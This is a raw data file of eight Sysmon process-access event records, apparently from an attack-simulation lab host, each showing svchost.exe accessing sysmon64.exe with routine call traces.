{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7250,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7251,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7252,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:51","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:51.621\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:51.621","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
